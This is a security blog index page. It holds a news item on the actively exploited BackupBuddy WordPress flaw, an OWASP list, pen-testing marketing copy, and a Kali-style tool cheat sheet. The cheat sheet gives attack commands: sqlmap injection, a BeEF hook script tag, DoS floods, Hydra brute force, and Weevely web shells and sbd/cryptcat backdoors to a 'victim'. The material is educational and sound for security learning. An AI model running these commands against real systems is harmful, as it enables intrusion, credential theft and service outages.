Web Application Security

  • Home
  • Web Application Security

Latest News From Blog

Image Web Application Security

Experts warn of attacks exploiting zero-day in WordPress BackupBuddy plugin

Threat actors are exploiting a zero-day vulnerability in a WordPress plugin called BackupBuddy, Wordfence researchers warned.On September 6, 2022, the Wordfence Threat Intelligence team was informed of a vulnerability being actively exploited in the BackupBuddy WordPress plugin. This plugin allows users to back up an entire WordPress installation, including theme files, pages, posts, widgets, users, and media files.The vulnerability, tracked as CVE-2022-31474 (CVSS score: 7.5), can be exploited by an unauthenticated user to download arbitrary files from the affected site. It has been estimated that the plugin has around 140,000 active installations.Wordfence researchers determined that threat actors started exploiting this vulnerability in the wild on August 26, 2022. The security firm also added to have blocked 4,948,926 attacks exploiting this vulnerability since that time.The attackers were attempting to retrieve sensitive files such as the /wp-config.php and /etc/passwd.The vulnerability affects versions 8.5.8.0 to 8.7.4.1 and was fixed with the release of version 8.7.5 on September 2, 2022.The plugin allows storing backup files in multiple locations (Destinations) including Google Drive, OneDrive, and AWS. The plugin also allows storing backups via the ‘Local Directory Copy’ option, but experts discovered that this feature isn’t secure and allows unauthenticated users to download any file stored on the server.“More specifically the plugin registers an admin_init hook for the function intended to download local back-up files and the function itself did not have any capability checks nor any nonce validation. This means that the function could be triggered via any administrative page, including those that can be called without authentication (admin-post.php), making it possible for unauthenticated users to call the function.” reads the report. “The back-up path is not validated and therefore an arbitrary file could be supplied and subsequently downloaded.”Due to this vulnerability being actively exploited, and its ease of exploitation, we are sharing minimal details about this vulnerability.Wordfence did not share additional details about the flaw because it is easy to exploit

Read More
Image Web Application Security

Most common web security vulnerabilities!

OWASP or Open Web Security Project is a non-profit charitable organization focused on improving the security of software and web applications. The organization publishes a list of top web security vulnerabilities based on the data from various security organizations. The web security vulnerabilities are prioritized depending on exploitability, detectability and impact on software.Exploitability - What is needed to exploit the security vulnerability? Highest exploitability when the attack needs only web browser and lowest being advanced programming and tools.Detectability - How easy is it to detect the threat? Highest being the information displayed on URL, Form or Error message and lowest being source code.Impact or Damage - How much damage will be done if the security vulnerability is exposed or attacked? Highest being complete system crash and lowest being nothing at all.The main aim of OWASP Top 10 is to educate the developers, designers, managers, architects and organizations about the most important security vulnerabilities.The Top 10 security vulnerabilities as per OWASP Top 10 are:i.SQL Injectionii.Cross Site Scriptingiii.Broken Authentication and Session Managementiv.Insecure Direct Object Referencesv.Cross Site Request Forgeryvi.Security Misconfigurationvii.Insecure Cryptographic Storageviii.Failure to restrict URL Accessix.Insufficient Transport Layer Protection

Read More
Image Web Application Security

What is Penetration Testing and How Does It Work?

Penetration testing is also called pen-testing. Basically, it is a testing method that has been used to enhance the security of an application. This testing method simulates various attacks that may threaten your business application.Hence to protect a business from unwanted hacks and enhance the security feature, penetration testing is used. So here, we will get to know about Penetration Testing Tools and Techniques.QAble is one of the renowned Penetration testing companies in India & USA and we follow the best penetration testing techniques to meet the requirement.As we know, the security of an application matters the most and through smart penetration testing tools, we simulate possible attacks.Further, our team assures the robustness of an application by analyzing whether they are able to resist the attack or not. If you are looking to strengthen your application, we have the best team so far.Hence hire the best QA tester in India to enhance the security protocol of the app.Do you know about network penetration testing?Network penetration testing simulates activities that a hacker may use to exploit your network. Here, without malicious intent, the testers perform pen-testing. Also, to strengthen the network, professionals are given complete authority so that they could take action as and when needed.They are also required to keep the management in the loop for every action and reaction. Moreover, if the experts take this testing lightly, there will be serious consequences and it could be the end of the business.What are the types of penetration testing?To expose the vulnerabilities within the system, a penetration system is a must. Here we will discuss the various types of penetration testing that will increase the pace of your search.Also, we have seen testers confused about the initialization of penetration testing. Knowing specific methods of penetration testing will help you taking the right decision for the security of the system.So let’s explore different types of pen testing:External Network Penetration Testing:Under this testing method, the team analyzes the public information available. They try to leverage the permeability of an online product by accessing public information. This information is like email address, company’s website link, and other external links.In external network pen testing, the expert will try to breach the firewall using the public data. Further, they use OSINT (Open-source intelligence) and internally built tools in order to hack the password.Hence following the testing method becomes mandatory because it reduces the potential network risks.Internal Network Penetration Testing:Through this pen testing method, the internal vulnerabilities are highlighted. As we know, applications are developed having various roles and rights. So, here the rights given to the team member are cross-verified.Suppose in a business application, employees are given some access in order to utilize the services. But at the same time, we need to check, using that information, if the employee could hack the entire system? This examination comes under internal network penetration testing.Physical Penetration Testing:Phishing emails are the best example to understand the concept of the social engineering pen testing method. The method takes an effort to gain the trust of the team member by confusing them to share personal information.In this method, a hacker behaves as a manager and asks the team member to share some crucial information and transfer funds urgently. Further, their intent is to exploit the employee and force him to reveal the data.Wireless Penetration Testing:We have seen many corporate whose security is breached using wireless mode. It is sad but true, nowadays so many tools are available online through which hackers can grasp information. And we know, without the internet a company cannot survive.Hence through wireless pen testing, we make sure the Wi-Fi connection and other involved devices are secured from unwanted hacks. See, the technology is getting advanced, negative powers are also improving.So, now there is a need to manage all your sources smartly.Conclusion :So far we have discussed about penetration testing. And here at QAble we are offering excellent penetration testing services in order to offer secure application experience.Further, using the dedicated penetration tools we simulate the system’s vulnerabilities and take the required action. Hence if you are looking for quality penetration testing services, we are your exclusive service partner.

Read More
Image Web Application Security

Why Is Penetration Testing Important For Your Website?

We often see news headlines about security breaches in big companies and the loss such breaches amount to. In today's world, hackers have advanced tools and techniques to identify even the smallest vulnerabilities in a company’s internet-facing application. They exploit these vulnerabilities to compromise the security of a system. What’s even worse is that the IT teams or network admins often identify the attack after it’s too late. And that’s exactly where the penetration testing comes in.What Is Penetration Testing?Penetration testing or pentesting is a popular security practice. Like we mentioned earlier, hackers look for vulnerabilities in an application or a network which they can exploit. The purpose of a penetration test is to identify these vulnerabilities before hackers do and patch them up on time. Pentesting involves a team of ethical hackers attempting to infiltrate all the security defenses and gain access to the application.Penetration testing is different from a vulnerability assessment scan. A vulnerability assessment will only give you a list of vulnerabilities. On the other hand, a penetration test will list out the vulnerabilities, their severity, and all possible fixes for them. Moreover, penetration tests usually comprise both human and automated tests. All this makes penetration testing a superior and efficient security practice.Why Penetration Testing is required?Penetration testing is popular for good reason. You can reap so many benefits from performing pentests regularly. It truly is an asset to your security system. So, let’s get right into the various benefits of penetration tests:1. Allows you to fix vulnerabilitiesPenetration testing uncovers even the smallest vulnerabilities on your application. Moreover, the vulnerabilities found will be classified into low risk, medium risk, and high risk. Using this information, you can prioritize the vulnerabilities and allot resources accordingly.Fixing these vulnerabilities will strengthen and reinforce the existing security system and strategy. Moreover, it gives you an opportunity to fix issues you didn’t know existed in your IT infrastructure.We are also seeing lot of traction for Smart Contract Audit as blockchain technology is rising.Furthermore, pentesters also reveal the damage that can occur, if a hacker was to exploit the vulnerabilities. Knowing this can help you prepare for a cyberattack accordingly. Lastly, most penetration testers like Astra provide assistance with fixing the loopholes they found. After a pentest, you are likely to receive a comprehensive report with all the information you need.i .Protects your business from potential attacksAccording to CNBC, hackers target small businesses 43% of the time considering just 14% of them are prepared to defend themselves. However, by conducting penetration tests, you can always stay a step ahead of hackers. You can shut all possible entries to your system and keep intruders out of your business.ii. Data ProtectionSensitive data falling into the wrong hands is every business owner's worst nightmare. Indeed it can definitely take a massive toll on the business itself from which it may never recover. Penetration tests can safeguard data by preventing any possible attack. For this reason, performing a penetration test is an absolute necessity.iii .Compliance with security regulations and lawsPenetration testing helps you with the requirements of PCI-DSS, GDPR, HIPAA, ISO-27001, etc. These are data compliance laws that are introduced by various governments and organizations in order to protect data. If a business is not compliant with these regulations, it will be subjected to severe ramifications in the form of hefty fines and bans.if a successful cyberattack was to take place, the company has to pay fines and compensations. Furthermore, they will have to spend a very significant amount of money for fixing the damages caused by the attack. They will also have to spend money upgrading the existing security system seeing as it wasn’t very effective in keeping hackers out. Moreover, when a cyberattack occurs all activities will cease costing their business a lot of money.According to Cybersecurity Ventures, around the globe cybercrime costs will hit $6 trillion annually by 2021. Here are some of the types of attacks you can face and the average cost of dealing with them:Ransomware attack - $133,000 per yearMalware attack - $2.6 million per yearData breaches - $3.92 million per yearPhishing - $17,700 per minuteFor better protection, it is always recommended to audit for your cloud infra too to ensure that all ports are secured, data is encrypted and best security practices are followed.ConclusionRoutine penetration testing should really be a priority if you are a website owner. It can reduce the chances of receiving a cyberattack by a huge margin. Ideally, this itself is reason enough to start conducting penetration tests. 

Read More
Image Web Application Security

Tools for Penetration Testing

While producing high-technology mobile apps and websites, there’s no way without security issues. That is why there are many top-notch pentest tools for handling multiple workflows that allow detection and elimination, as well as prevention of any web security attacks.What is Penetration Testing?The idea behind any penetration testing is to identify security-related vulnerabilities in a software application by conducting a security attack to determine how much damage a hacker may cause when trying to hack the product. The results of this practice help to make applications and software more secure, robust, and unbreakable, and the users’ experience – more successful.So, if you are going to develop and use any software for your business, the automated penetration testing method will help you to check network security threats.How Penetration Tests WorkPenetration testing is a simulated real-time cyber-attack conducted by certified security professionals (hackers) under secure conditions to detect gaps, glitches, vulnerabilities, loopholes, misconfigurations, etc. that are susceptible to further malicious code injections, malware, unauthorized entries, attacks, etc.Application testers then try and exploit these vulnerabilities, typically by stealing data, escalating privileges, intercepting traffic, etc., to understand the nature of damage they may cause. However, it’s hard to find all possible vulnerabilities using automated tools. There are some threats that can only be identified by manual system scans.To uncover the security vulnerabilities which can be found in any type or kind of Web Application, we may find three major tests types, which are as follows:Black Box Testing;White Box Testing;Gray Box Testing.Black box testing: A black box assessment is mostly performed without any knowledge of the system’s internals. Here testers check out the system solely from the outside. They have no idea of what is happening within the system to generate responses and test actions.White box testing: In a white box assessment, the testers have the fullest and most complete internal knowledge of the system that’s being tested (design docs, source code, etc.).Gray box testing: Gray box testing is another application security test technique that is a mix of both white box and black box testing.Best Penetration Testing01. Database Tools Usagesqlmapautomates the process of detectingand exploiting SQL injection flaws and taking over of database serverssqlmap –u victim_url sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686;rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 risk=3 -p id --suffix="-BR" -v3 02. CMS Scanning ToolsWPScanwpscan --version wpscan –u URL of webpage”. Joomscanjoomscan –h joomscan –-version joomscan /? joomscan –u victim_url 03. SSL Scanning ToolsTLSSLedtlssled URL port w3afwww audi frameworkstartw3af enter the URL of victimstart04. Metasploitmsfupdate msf > search name:Microsoft type:exploit. ArmitageMetaGUIBeEFbeef-xss username and password: beef.<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script> Linux Exploit Suggesterroot@parrot:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0Forensics Toolsp0f identify the operating system of a target host simply by examining captured packetsIn the hands of advanced users, P0f can detect firewallpresence, NAT use, and existence of load balancers.p0f –-version p0f -h p0f –i eth0 –p -o filename open 192.168.1.2pdf-parserparses a PDF document to identify the fundamental elements usedin the analyzed pdfpdf-parser -o 10 filepath dumpzillaextract all forensicinteresting information of Firefox, Iceweasel, and Seamonkey browsersddrescuecopies data from one file or block device (hard disc, cdrom, etc.) to another, trying torescue the good parts first in case of read errors.dd_rescue infilepath outfilepath dd_rescue -v /dev/sdb ~/sec.img DFFdff-guiSocial EngineeringSocial Engineering Toolkitsudo apt install sendmail vim config/set_config # SENDMAIL=OFF flag to SENDMAIL=ON. 05. Stressing ToolsDoS attacks or to create the stress test for differentapplications so as take appropriate measures for the future.Slowhttptestslowhttptest --version slowhttptest -h # sampel slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u http://192.168.1.202/index.php -x 24 -p 2 Where,(-c 500) = 500 connections(-H) = Slowloris mode-g = Generate statistics-o outputfile = Output file name-i 10 = Use 10 seconds to wait for data-r 200 = 200 connections with -t GET = GET requests-u http://192.168.1.202/index.php = target URL-x 24 = maximum of length of 24 bytes-p 2 = 2-second timeoutInvitefloodSIP/SDP INVITE message flooding over UDP/IP.inviteflood --version # format inviteflood eth0 target_extension target_domain target_ip number_of_packets # sample inviteflood eth0 2000 192.168.x.x 192.168.x.x 1 Where,target_extension is 2000target_domain is 192.168.x.xtarget_ip is 192.168.x.xnumber_of_packets is 1-a is alias of SIP accountIaxfloodVoIP DoS tooliaxflood –-version iaxflood –h iaxflood sourcename destinationname numpackets iaxflood ip_src ip_dest packets thc-ssl-dosverify the performance of SSLEstablishing a secure SSL connection requires 15x more processing power on the server than on the client.# format thc-ssl-dos victimIP httpsport –accept # examp thc-ssl-dos 192.168.1.1 443 –accept 06. Sniffing & SpoofingBurpsuitethe sniffing tool between your browser and the webservers to findthe parameters that the web application usesmitmproxySSL-capable man-in-the-middle HTTP proxy.mitmproxy –-version mitmproxy –h mitmproxy –p portnumber mitmproxy –p 80 07.WiresharksslstripMITM attack that forces a victim's browser to communicate in plain-text over HTTPsslstrip --version sslstrip -h sslstrip -p 80 08. Password Cracking ToolsHydralogin cracker that supports many protocols to attackhydra -l /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 –V JohnnyGUI for the John the Ripper password cracking toolJohnCLI for Johnny GUI.unshadow passwd shadow > unshadowed.txt Rainbowcrack cracks hashes by rainbow table lookup.rcrack -h rcrack path_to_rainbow_tables -f path_to_password_hash rcrack path_to_rainbow_tables -f path_to_password_hash ./rcrack . -h 5d41402abc4b2a76b9719d911017c592 ./rcrack . -l hash.txt SQLdict09.dictionary attack tool for SQL serversqldict Under “Target IP Server”,Under “Target Account”, enter the username.load the file with the passwordstarthash-identifieridentify types of hasheshash-identifier 5d41402abc4b2a76b9719d911017c592 10.Maintaining Accessuses to maintain connection and for access toa hacked machine even when it connects and disconnects again.Powersploithelp to connect with the victim’s machine via PowerShell.cd /usr/share/powersploit/ Sbdsimilar to Netcatfeatures AES-CBC-128 + HMAC-SHA1 encryption# server sbd -l -p 44 # visctim sbd 192.168.43.2 44 WeevelyPHP web shell that simulate telnet-like connectionused as a stealth backdoor# check weevely -h # format weevely generate password pathoffile # sample weevely generate adm1n123 ~/Desktop/about1.php # formart weevely URL password # sample weevely http://198.168.32.13 adm1n123 http-tunnelcreates a bidirectional virtual data stream tunneled in HTTP requestsThis can be useful for users behind restrictive firewalls.# server httptunnel_server –h # client httptunnel_client –h cryptcatsimilar to Netcat which allows to make TCP and UDP connection with a victim’smachine in an encrypted way# server cryptcat –l –p port –n # client cryptcat IPofServer PortofServer 11.Reverse EngineeringOllyDbg32-bit assembler level analyzing debugger for MS Windows applicationsused to crack the commercial softwares.startollydbg dex2jarconvert APK file (android) to JAR file in order to view the source code.d2j-dex2jar –d /file location d2j-dex2jar –d ~/Desktop/class.dex jd-guistandalone graphical utility that displays Java source codes of “.class” files.jd-gui apktoolbest tools to reverse the whole android applicationapktool # decompile apktool d apk file 12.Reporting ToolsDradisservice dradis start dradis open https://machine_ip:3004import files from NMAP, NESSUS, NEXPOSEMetagoofilsearch in Google to identify and download the documents to the localdisk and then extracts the metadata# help metagoofil -h metagoofil -d udsm -t docx -l 3 -o ~/Downloads -f ~/Downloads/metagoofil_res –d (domain name)–t (filetype to download dox,pdf,etc)–l (limit the results 10, 100 )–n (limit files to download)–o ( location to save the files)–f (output file)Miscstrace# sample strace –e trace=network,read,write /path/to/app args # example strace -e trace=network,read,write customapp

Read More